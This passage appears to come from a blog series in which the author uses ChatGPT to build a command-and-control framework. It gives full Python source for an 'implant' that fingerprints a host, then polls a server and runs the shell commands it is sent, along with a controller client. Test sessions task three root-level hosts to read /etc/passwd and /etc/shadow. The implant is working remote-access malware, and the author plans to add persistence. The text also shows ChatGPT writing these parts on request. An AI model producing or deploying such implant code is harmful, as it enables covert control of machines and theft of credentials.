$ curl -s http://127.0.0.1:5000/get_output?task_uuid=be33a894-00e0-4003-9053-a12c2cca330b | jq
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:54:48.561148",
"task_data": "bHMgLwo=",
"task_executed_time": "2023-05-02 09:56:45.010077",
"task_result": "loltest",
"task_status": 2,
"task_uuid": "be33a894-00e0-4003-9053-a12c2cca330b"
}
Finally, we list implants again to verify its "last seen" time was updated.
$ curl -s http://127.0.0.1:5000/list_implants | jq
{
"implants": [
{
"first_seen": "2023-05-02 09:51:10.416314",
"implant_build_id": "81312ee0edbffd6eacabe62905325051",
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"implant_uname": "TGludXggZGViaWFuIDUuMTAuMC05LWFtZDY0ICMxIFNNUCBEZWJpYW4gNS4xMC43MC0xICgyMDIxLTA5LTMwKSB4ODZfNjQgR05VL0xpbnV4Cg==",
"implant_user": "dWlkPTEwMDEodXNlcikgZ2lkPTEwMDEodXNlcikgZ3JvdXBzPTEwMDEodXNlciksMjcoc3VkbykK",
"last_seen": "2023-05-02 09:56:45.005441"
}
]
}
$
All in all, pretty much all the intended functionality is working just fine on the server side of the fence. I'm fairly confident that our glorified shit tier message queue is working just fine.
Making ChatGPT Build The Reference Implant in Python.
I guess the prompt and output will go first.
In Python, write a program that does the following:
Reads the contents of the /etc/machine-id file, removes any trailing newline, and stores it as a variable named "implant_machine_id"
Has an empty variable named "implant_build_id" that will contain a random 32 character string.
Executes the shell command "id", base64 encodes the output, and stores it as a variable named "implant_user".
Executes the shell command "uname -a", base64 encodes the output, and stores it as a variable named "implant_uname".
On launch, sends a HTTP POST request to the URL "http://127.0.0.1:5000/register" containing the POST parameters "implant_machine_id", "implant_build_id", "implant_user", and "implant_uname", with their POST data set to the contents of the variables which have the same name.
It should then enter a while loop, in which it does the following steps:
1. Make a HTTP POST request to http://127.0.0.1:5000/get_task, sending its implant_machine_id.
2. If the response is a 404, sleep for 60 seconds and break.
3. If the response code is 200, extract the task_uuid and task_data from the JSON response.
4. base64 decode the task_data, execute it as a shell command, and capture the output.
5. base64 encode the output of the shell command, storing this as task_result.
6. Send a HTTP POST request to http://127.0.0.1:5000/submit_result containing the implant_machine_id, task_uuid, and task_result.
7. Sleep for 60 seconds.
import requests
import subprocess
import base64
import random
import string
import json
import time
# Read implant machine ID from file and remove newline
with open('/etc/machine-id', 'r') as f:
implant_machine_id = f.read().rstrip()
# Generate random 32-character string for implant build ID
implant_build_id = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(32))
# Execute shell command "id" and base64 encode output
implant_user = subprocess.check_output(['id']).strip()
implant_user = base64.b64encode(implant_user).decode('utf-8')
# Execute shell command "uname -a" and base64 encode output
implant_uname = subprocess.check_output(['uname', '-a']).strip()
implant_uname = base64.b64encode(implant_uname).decode('utf-8')
# Send HTTP POST request to register implant with server
register_data = {
'implant_machine_id': implant_machine_id,
'implant_build_id': implant_build_id,
'implant_user': implant_user,
'implant_uname': implant_uname
}
register_response = requests.post('http://127.0.0.1:5000/register', data=register_data)
if register_response.status_code != 200:
print('Registration failed')
exit()
# Enter while loop to retrieve and execute tasks
while True:
# Send HTTP POST request to get task
get_task_data = {'implant_machine_id': implant_machine_id}
get_task_response = requests.post('http://127.0.0.1:5000/get_task', data=get_task_data)
# Check response code
if get_task_response.status_code == 404:
# If task not found, sleep for 60 seconds and try again
time.sleep(60)
continue
elif get_task_response.status_code != 200:
# If unexpected response code, print error and exit
print('Error getting task:', get_task_response.status_code)
exit()
# Extract task UUID and task data from JSON response
task_json = json.loads(get_task_response.text)
task_uuid = task_json['task_uuid']
task_data = task_json['task_data']
# Decode task data and execute as shell command
task_command = base64.b64decode(task_data).decode('utf-8')
task_output = subprocess.check_output(task_command, shell=True).strip()
# Base64 encode output and submit task result to server
task_result = base64.b64encode(task_output).decode('utf-8')
submit_result_data = {
'implant_machine_id': implant_machine_id,
'task_uuid': task_uuid,
'task_result': task_result
}
submit_result_response = requests.post('http://127.0.0.1:5000/submit_result', data=submit_result_data)
# Sleep for 60 seconds before getting next task
time.sleep(60)
End to end testing with the implant, and "curl".
You know, somewhat surprisingly, I just had to replace the implant_build_id part as GPT was trying to be too clever for its own good.
Listing implants...
$ curl -s http://127.0.0.1:5000/list_implants | jq
{
"implants": [
{
"first_seen": "2023-05-02 11:15:10.217162",
"implant_build_id": "2daf0aa5c59804746a4314d3284d66ed",
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"implant_uname": "SNIP",
"implant_user": "SNIP",
"last_seen": "2023-05-02 11:17:10.361762"
}
]
}
$
Adding a task...
$ curl -s http://127.0.0.1:5000/submit_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_data=bHMgLwo='
{"implant_machine_id":"79ef32b5ea31cbff9bbd405c61a6440d","task_uuid":"1395ea71-d201-484e-a1b1-194f0bc8d250"}
Listing tasks, suddenly its done!
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 11:16:21.176785",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "1395ea71-d201-484e-a1b1-194f0bc8d250"
}
]
}
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 11:16:21.176785",
"task_data": "bHMgLwo=",
"task_executed_time": "2023-05-02 11:17:10.364539",
"task_status": 2,
"task_uuid": "1395ea71-d201-484e-a1b1-194f0bc8d250"
}
]
}
Getting task output...
$ curl -s http://127.0.0.1:5000/get_output?task_uuid=1395ea71-d201-484e-a1b1-194f0bc8d250 | jq .task_result | sed s/\"//g | base64 -d
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lol
lol.bin
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
test.txt
tmp
usr
var
vmlinuz
vmlinuz.old$
At this point, we did have to fix one bug I found. In the database, the implant_machine_id
was not a primary key, so it was possible to have multiple identical implants.
This is no fucking good at all, so I made that column a primary key, and that fixes the issue.
HOWEVER, it means an implant can only register once, which is a problem if you are aiming for persistence. We will have to add some fixes for this on the client and server side later - eg: a special response saying "already registered".
For what its worth though - at this time we do have a fully working implant and can control it via HTTP requests...
Making ChatGPT Build The Reference Controller Client.
This required some thinking. I personally don't really like prompt-based clients for... Anything, really. I can deal with it for tools like Metasploit, but I don't actually like the UI that much, especially for asynchronous implants.
I much prefer a command line tool that takes arguments via argparse or similar, and outputs text.
So I decided that our initial "Controller Client" would be a simple command line tool that lets us perform a number of tasks.
Most of this shit is going to be argparse boilerplate (that years later, I still have to look up every time), so GPT is actually perfect for this.
So lets list the arguments/options we actually need.
--list-agents
: Lists implants, outputs information about them in some kind of format that doesn't hurt the eyes too badly.--agent MACHINE_ID
: Specifies the machine ID of an agent for other commands.--get-tasks
: Get tasks, either all tasks... Or just the ones for a specific agent, if the --agent
flag is set.--submit-task TASK_DATA
: Submits a task (a shell command). Requires --agent
to be set, returns a TASK_UUID. --task TASK_UUID
: A specific task UUID.--get-output
: Get the output for a task. Requires --task
to be set.--cancel-task
: Cancels a task (if not already running). Requires --task
to be set.
The first order of business was to get it to just implement a skeleton, and the "list agents" feature.
I would like to write a simple command line client in Python for an HTTP API, using argparse and requests libraries.
It should accept the following arguments:
--list-agents (no args)
--agent AGENT_ID
--get-tasks (no args)
--submit-task TASK_DATA
--task TASK_UUID
--get-output (no args)
--cancel (no args)
the --list-agents function should make a HTTP GET request to http://127.0.0.1:5000/list_implants, convert the JSON output to a table, base64 decode the "implant_uname" and "implant_user" fields, and print the table to the console.
This went about as well as could be expected. The output is pretty "big" and even GPT couldn't make it look pretty, so I decided fuck it, it can emit a tab separated values file. For scripting. This also was completely unreadable by default.
import argparse
import base64
import json
import requests
from prettytable import PrettyTable
API_URL = 'http://127.0.0.1:5000'
def list_agents():
url = f'{API_URL}/list_implants'
response = requests.get(url)
if response.status_code == 200:
agents = json.loads(response.text)
table = PrettyTable()
table.field_names = ['ID', 'Implant Uname', 'Implant User']
for agent in agents:
table.add_row([agent['id'], base64.b64decode(agent['implant_uname']).decode(),
base64.b64decode(agent['implant_user']).decode()])
print(table)
else:
print(f'Error: {response.status_code}')
def get_tasks(agent_id):
pass
def submit_task(task_data):
pass
def get_output(task_uuid):
pass
def cancel():
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='HTTP API client')
parser.add_argument('--list-agents', action='store_true', help='List all agents')
parser.add_argument('--agent', dest='agent_id', help='Agent ID')
parser.add_argument('--get-tasks', action='store_true', help='Get tasks for the specified agent')
parser.add_argument('--submit-task', dest='task_data', help='Submit a task')
parser.add_argument('--task', dest='task_uuid', help='Task UUID')
parser.add_argument('--get-output', action='store_true', help='Get output for the specified task')
parser.add_argument('--cancel', action='store_true', help='Cancel the specified task')
args = parser.parse_args()
if args.list_agents:
list_agents()
elif args.agent_id:
get_tasks(args.agent_id)
elif args.get_tasks:
get_tasks()
elif args.task_data:
submit_task(args.task_data)
elif args.task_uuid:
get_output(args.task_uuid)
elif args.get_output:
get_output()
elif args.cancel:
cancel()
else:
parser.print_help()
I ended up just writing my own output format, which is also ugly, but at least I can read it.
def list_agents():
url = f'{API_URL}/list_implants'
response = requests.get(url)
if response.status_code == 200:
agents = json.loads(response.text)['implants']
print('='*20)
for agent in agents:
print("Machine ID: " + agent['implant_machine_id'])
print("uname -a: " + base64.b64decode(agent['implant_uname']).decode())
print("user id: " + base64.b64decode(agent['implant_user']).decode())
print("First Seen: " + agent['first_seen'])
print("Last Seen: " + agent['last_seen'])
print("Build ID: " + agent['implant_build_id'])
print('='*20)
else:
print(f'Error: {response.status_code}')
$ python3 control.py --list-agents
====================
Machine ID: 79ef32b5ea31cbff9bbd405c61a6440d
uname -a: Linux debian 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux
user id: uid=1001(user) gid=1001(user) groups=1001(user),27(sudo)
First Seen: 2023-05-02 11:15:10.217162
Last Seen: 2023-05-02 15:14:32.824819
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
We will probably have to repeat this (making our own output format) for every other command, to be honest. That is fine.
Handling the problem of "get_tasks" having an optional "agent" argument supplied by the "agent" flag is something I could look up in the argparse documents, but also, I can reliably assume someone fed those documents to ChatGPT and it can figure that out for me already.
Task list output is going to be problematic, I think I will have it (with no agent specified) just emit all tasks in order of time, with the same format style as the list_agents. I'll probably also have to come up with a way to convert the status-integers into human readable words. Not hard.
Anyway, here is the prompt, and its output.
Ok, can you now implement the get_tasks function? Optionally passing it an implant_machine_id from the --agent flag if that flag is set?
The get_tasks function should send a HTTP GET request to the http://127.0.0.1:5000/list_tasks endpoint.
If an implant_machine_id variable is set, this can be passed as a GET parameter called machine_id.
The JSON output of this endpoint looks like the following example:
```json
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
}
]
}
```
The output from this command should print each tasks data out.
It should convert the "task_status" integer into a text using the following lookup:
0 = Task Pending
1 = Task In Progress
2 = Task Executed
3 = Task Cancelled
Sure, here's a function that should do what you're asking for:
```python
def get_tasks(args):
params = {}
if args.agent:
params['machine_id'] = args.agent
url = f'{API_URL}/list_tasks'
response = requests.get(url, params=params)
if response.status_code == 200:
tasks = json.loads(response.text)['tasks']
for task in tasks:
task_status = {
0: 'Task Pending',
1: 'Task In Progress',
2: 'Task Executed',
3: 'Task Cancelled'
}[task['task_status']]
task_data = base64.b64decode(task['task_data']).decode()
print(f'Task UUID: {task["task_uuid"]}')
print(f'Created Time: {task["task_created_time"]}')
print(f'Executed Time: {task["task_executed_time"]}')
print(f'Status: {task_status}')
print(f'Data: {task_data}\n')
else:
print(f'Error: {response.status_code}')
```
This function takes the parsed command-line arguments as its argument (`args`), and checks if the `--agent` flag was set. If it was, it adds the `machine_id` parameter to the GET request. The response from the API is then parsed as JSON, and each task is printed to the console with the decoded task data and a human-readable status string based on the task status lookup.
You can run this function by calling it with the parsed command-line arguments like so:
```python
if args.get_tasks:
get_tasks(args)
```
If you run the script with the `--get-tasks` flag, it will call the `get_tasks()` function with the parsed arguments. If the `--agent` flag was set, it will filter the tasks by the specified agent ID. The output of this function will print each task's data as described in the prompt.
This required minimal modifications on my test instance (which only had one task anyway). Still not SUPER happy with the output, but whatever.
$ python control.py --get-tasks
====================
Machine ID: 79ef32b5ea31cbff9bbd405c61a6440d
Task UUID: 1395ea71-d201-484e-a1b1-194f0bc8d250
Created Time: 2023-05-02 11:16:21.176785
Executed Time: 2023-05-02 11:17:10.364539
Status: Task Executed
Data: ls /
====================
$ python control.py --get-tasks --agent 79ef32b5ea31cbff9bbd405c61a6440d
====================
Machine ID: 79ef32b5ea31cbff9bbd405c61a6440d
Task UUID: 1395ea71-d201-484e-a1b1-194f0bc8d250
Created Time: 2023-05-02 11:16:21.176785
Executed Time: 2023-05-02 11:17:10.364539
Status: Task Executed
Data: ls /
====================
The "submit_task" function will have a mandatory requirement for the agent parameter to be set - another thing that argparse can probably resolve for us here.
One issue I foresee with submit_task is "bad characters" like quotes, I think I will just leave it in such a way that the user can handle that with shell quoting for now. It gets encoded before its submitted anyway.
The prompt was as follows:
Ok. Now can we implement `submit_task`? This function should require the use of the `agent` parameter to define an implant_machine_id, and throw an error if that parameter is missing.
The 'submit-task' flag should accept one argument, which is mandatory, the text of the task to send, stored as task_data_plain.
It should send a HTTP POST request to http://127.0.0.1:5000/submit_task with the implant_machine_id parameter set to the implant_machine_id, and the task_data paramater containing the task_data_plain encoded as base64.
This will result in a JSON response like the following:
```json
{"implant_machine_id":"79ef32b5ea31cbff9bbd405c61a6440d","task_uuid":"1395ea71-d201-484e-a1b1-194f0bc8d250"}
```
Assuming all succeeds, the function should print out the implant_machine_id and task_uuid.
Its output here was not terrible, but also was incorrect. I didn't bother correcting it, as it took less time for me to fix by hand.
Certainly! Here's the implementation for the `submit_task` function:
```python
import base64
def submit_task(args):
if not args.agent:
raise ValueError("agent is required to submit a task")
task_data_plain = args.submit_task
url = "http://127.0.0.1:5000/submit_task"
params = {"implant_machine_id": args.agent}
headers = {"Content-Type": "application/json"}
task_data = base64.b64encode(task_data_plain.encode("utf-8")).decode("utf-8")
data = {"task_data": task_data}
response = requests.post(url, params=params, headers=headers, json=data)
response.raise_for_status()
json_response = response.json()
implant_machine_id = json_response["implant_machine_id"]
task_uuid = json_response["task_uuid"]
print(f"Task submitted with implant_machine_id: {implant_machine_id} and task_uuid: {task_uuid}")
```
You can call this function using the `--submit-task` flag, like this:
```
python my_script.py --agent 79ef32b5ea31cbff9bbd405c61a6440d --submit-task "ls"
```
get_output and cancel both have a mandatory task_uuid requirement. As for output - cancel is easy - just returns a "cancelled" or "could not cancel, sorry".
Here is the prompt for cancelling. At this point, I was a bit tired.
Ok, now we need the "cancel" function. This should require a mandatory argument of task_uuid. If task_uuid is not set, it should exit with an error message.
The cancel function sends a HTTP GET request to an endpoint named /cancel_task on http://127.0.0.1:5000, with the GET parameter of task_uuid containing the task_uuid to be cancelled.
If the response is a 404, return an error of "Task does not exist!".
If the response is a 200, and the JSON body contains the string "error", print that the task could not be cancelled.
If the response is a 200, and the JSON body contains the string "success". print that the task was cancelled successfully.
And the output... It will need some cleaning by hand.
Sure! Here's the implementation of the `cancel` function:
```python
import requests
import argparse
def cancel(args):
if not args.task_uuid:
print("Error: task_uuid is required!")
return
params = {'task_uuid': args.task_uuid}
response = requests.get('http://127.0.0.1:5000/cancel_task', params=params)
if response.status_code == 404:
print("Task does not exist!")
elif response.status_code == 200:
response_json = response.json()
if "error" in response_json:
print("Error: Could not cancel task!")
elif "success" in response_json:
print("Task was cancelled successfully!")
else:
print("Error: Unexpected response from server.")
```
The `cancel` function takes an argument `args` which contains the parsed command line arguments, including `task_uuid` as a required argument. The function checks if `task_uuid` is set and returns an error message if it is not.
The function then sets the `task_uuid` parameter in a GET request to the `/cancel_task` endpoint and sends the request to the server. If the response status code is 404, it prints an error message that the task does not exist. If the status code is 200, the function parses the JSON response and checks if the "error" or "success" strings are present in the response. Based on the presence of these strings, it prints an appropriate message. If the response status code is not 404 or 200, the function prints an error message indicating that an unexpected response was received from the server.
For output of get_output, I think the best way is to print the machine ID, the submit date, the execution date, a the task that was submitted, some kind of separator, and then the output itself.
Prompt.
finally we need the get_output function. Again, this function should throw an error if the task_uuid argument is not provided.
get_output sends a HTTP GET request to the endpoint http://127.0.0.1:5000/get_output with the task_uuid parameter set to the task_uuid.
An example JSON response is as follows:
```json
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 11:16:21.176785",
"task_data": "bHMgLwo=",
"task_executed_time": "2023-05-02 11:17:10.364539",
"task_result": "blah",
"task_status": 2,
"task_uuid": "1395ea71-d201-484e-a1b1-194f0bc8d250"
}
```
The function should print the implant_machine_id as Machine ID.
The function should print the task_uuid as Task UUID.
The function should base64 decode the task_data and print it as "Task Data".
The function should print the task_created_time and task_executed_time as Task Created Time and Task Executed Time respectively.
The function should finally print the base64 decoded contents of the task_result field, followed by two newlines.
And result, which isn't terrible...
Sure! Here's the implementation for the `get_output` function:
```python
import requests
import base64
def get_output(task_uuid):
if not task_uuid:
raise ValueError("Task UUID must be provided.")
url = f"http://127.0.0.1:5000/get_output?task_uuid={task_uuid}"
response = requests.get(url)
if response.status_code == 404:
print("Task does not exist!")
return
elif response.status_code == 200:
data = response.json()
print("Machine ID:", data["implant_machine_id"])
print("Task UUID:", data["task_uuid"])
task_data = base64.b64decode(data["task_data"]).decode("utf-8")
print("Task Data:", task_data)
print("Task Created Time:", data["task_created_time"])
print("Task Executed Time:", data["task_executed_time"])
task_result = base64.b64decode(data["task_result"]).decode("utf-8")
print("Task Result:")
print(task_result)
print()
if "error" in data:
print("Task could not be retrieved.")
return
else:
print("Task retrieved successfully.")
return
else:
print("Error occurred during request.")
return
```
The function first checks that the `task_uuid` argument is provided, raising a `ValueError` if not.
Then, it builds the URL with the provided `task_uuid` parameter and makes a GET request to the `/get_output` endpoint on the local server.
If the response status code is 404, it prints "Task does not exist!" and returns.
If the response status code is 200, it prints the Machine ID and Task UUID fields, and base64 decodes the Task Data and Task Result fields, printing them out as well. Finally, it checks for the presence of the "error" field in the response JSON. If it's present, it prints "Task could not be retrieved." If not, it prints "Task retrieved successfully."
If the response status code is something other than 404 or 200, it simply prints "Error occurred during request." and returns.
As this goes on, I find myself less and less satisfied with the "client", and doubtlessly will end up writing a few different variations. I also find myself less satisfied with the API, wanting more options for filtering output on the server-side, making of specific queries, etc. But that is all a problem for later me to deal with.
I also realised a massive oversight was not having the database record the external/internal IP addresses.
Finally, we can run an end to end test of the client software, after some hand polishing to fix a number of bugs, which is frankly kind of alright for our purposes right now. We tested it with three "implanted hosts". Here is the session.
$ python control.py --list-agents
====================
Machine ID: b74deeb2d0f0425199a8e2f562166824
uname -a: Linux cowrie-001 5.19.0-29-generic #30-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 4 12:14:09 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:57:44.696832
Last Seen: 2023-05-07 11:57:45.250099
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
$ python control.py --list-agents
====================
Machine ID: b74deeb2d0f0425199a8e2f562166824
uname -a: Linux cowrie-001 5.19.0-29-generic #30-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 4 12:14:09 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:57:44.696832
Last Seen: 2023-05-07 11:57:45.250099
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
Machine ID: 64db882066b74310abc208605a0723a6
uname -a: Linux cowrie-003 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:58:09.030243
Last Seen: 2023-05-07 11:58:09.057521
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
uname -a: Linux cowrie-002 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:58:21.157459
Last Seen: 2023-05-07 11:58:21.317397
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
#### ok, now lets make some work for the bots.
$ python control.py --agent b74deeb2d0f0425199a8e2f562166824 --submit-task 'ls /'
Task submitted with implant_machine_id: b74deeb2d0f0425199a8e2f562166824 and task_uuid: 95750291-da77-4976-aa5a-4b958c18d50a
$ python control.py --agent 64db882066b74310abc208605a0723a6 --submit-task 'cat /etc/passwd'
Task submitted with implant_machine_id: 64db882066b74310abc208605a0723a6 and task_uuid: b183bdce-f823-459a-9a3b-37aa0fadd93f
$ python control.py --agent 0119f1ca03684159ae9396a8d3358dd4 --submit-task 'cat /proc/version'
Task submitted with implant_machine_id: 0119f1ca03684159ae9396a8d3358dd4 and task_uuid: 46a58a37-0aac-4b43-8112-b752904bdc1e
$ python control.py --agent 0119f1ca03684159ae9396a8d3358dd4 --submit-task 'cat /proc/self/cmdline'
Task submitted with implant_machine_id: 0119f1ca03684159ae9396a8d3358dd4 and task_uuid: 1c4196a2-c02c-437c-846d-b65cf4ab8a45
$ python control.py --agent 0119f1ca03684159ae9396a8d3358dd4 --submit-task 'grep bin /etc/shadow'
Task submitted with implant_machine_id: 0119f1ca03684159ae9396a8d3358dd4 and task_uuid: 5a243cbb-1f99-404e-bb40-8b8759a772ee
### lets list the jobs...
$ python control.py --get-tasks
Machine ID: b74deeb2d0f0425199a8e2f562166824
Task UUID: 95750291-da77-4976-aa5a-4b958c18d50a
Created Time: 2023-05-07 11:59:53.352064
Executed Time: 2023-05-07 12:00:47.671617
Status: Task Executed
Data: ls /
====================
Machine ID: 64db882066b74310abc208605a0723a6
Task UUID: b183bdce-f823-459a-9a3b-37aa0fadd93f
Created Time: 2023-05-07 12:00:14.125102
Executed Time: None
Status: Task Pending
Data: cat /etc/passwd
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 46a58a37-0aac-4b43-8112-b752904bdc1e
Created Time: 2023-05-07 12:00:36.898891
Executed Time: None
Status: Task Pending
Data: cat /proc/version
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 1c4196a2-c02c-437c-846d-b65cf4ab8a45
Created Time: 2023-05-07 12:00:45.387467
Executed Time: None
Status: Task Pending
Data: cat /proc/self/cmdline
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 5a243cbb-1f99-404e-bb40-8b8759a772ee
Created Time: 2023-05-07 12:00:55.044400
Executed Time: None
Status: Task Pending
Data: grep bin /etc/shadow
====================
### lets cancel a job and see what happens.
$ python control.py --task 5a243cbb-1f99-404e-bb40-8b8759a772ee --cancel
$ python control.py --get-tasks
Machine ID: b74deeb2d0f0425199a8e2f562166824
Task UUID: 95750291-da77-4976-aa5a-4b958c18d50a
Created Time: 2023-05-07 11:59:53.352064
Executed Time: 2023-05-07 12:00:47.671617
Status: Task Executed
Data: ls /
====================
Machine ID: 64db882066b74310abc208605a0723a6
Task UUID: b183bdce-f823-459a-9a3b-37aa0fadd93f
Created Time: 2023-05-07 12:00:14.125102
Executed Time: 2023-05-07 12:01:09.303686
Status: Task Executed
Data: cat /etc/passwd
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 46a58a37-0aac-4b43-8112-b752904bdc1e
Created Time: 2023-05-07 12:00:36.898891
Executed Time: 2023-05-07 12:01:22.147937
Status: Task Executed
Data: cat /proc/version
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 1c4196a2-c02c-437c-846d-b65cf4ab8a45
Created Time: 2023-05-07 12:00:45.387467
Executed Time: None
Status: Task Pending
Data: cat /proc/self/cmdline
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 5a243cbb-1f99-404e-bb40-8b8759a772ee
Created Time: 2023-05-07 12:00:55.044400
Executed Time: None
Status: Task Cancelled
Data: grep bin /etc/shadow
====================
$
# now lets start getting task data.
$ python control.py --task 46a58a37-0aac-4b43-8112-b752904bdc1e --get-output
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
Task UUID: 46a58a37-0aac-4b43-8112-b752904bdc1e
Task Data: cat /proc/version
Task Created Time: 2023-05-07 12:00:36.898891
Task Executed Time: 2023-05-07 12:01:22.147937
Task Result:
Linux version 5.15.0-58-generic (buildd@lcy02-amd64-101) (gcc (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023
Task retrieved successfully.
$ python control.py --task b183bdce-f823-459a-9a3b-37aa0fadd93f --get-output
Machine ID: 64db882066b74310abc208605a0723a6
Task UUID: b183bdce-f823-459a-9a3b-37aa0fadd93f
Task Data: cat /etc/passwd
Task Created Time: 2023-05-07 12:00:14.125102
Task Executed Time: 2023-05-07 12:01:09.303686
Task Result:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
ubuntu:x:1000:1000:guest:/home/ubuntu:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
fwupd-refresh:x:113:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
cowrie:x:1001:1001:,,,:/home/cowrie:/bin/bash
### finally we list agents again to double check the last seens have been updated.
$ python control.py --list-agents
====================
Machine ID: b74deeb2d0f0425199a8e2f562166824
uname -a: Linux cowrie-001 5.19.0-29-generic #30-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 4 12:14:09 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:57:44.696832
Last Seen: 2023-05-07 12:06:51.396213
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
Machine ID: 64db882066b74310abc208605a0723a6
uname -a: Linux cowrie-003 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:58:09.030243
Last Seen: 2023-05-07 12:07:09.726683
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
Machine ID: 0119f1ca03684159ae9396a8d3358dd4
uname -a: Linux cowrie-002 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
user id: uid=0(root) gid=0(root) groups=0(root)
First Seen: 2023-05-07 11:58:21.157459
Last Seen: 2023-05-07 12:07:23.465471
Build ID: 2daf0aa5c59804746a4314d3284d66ed
====================
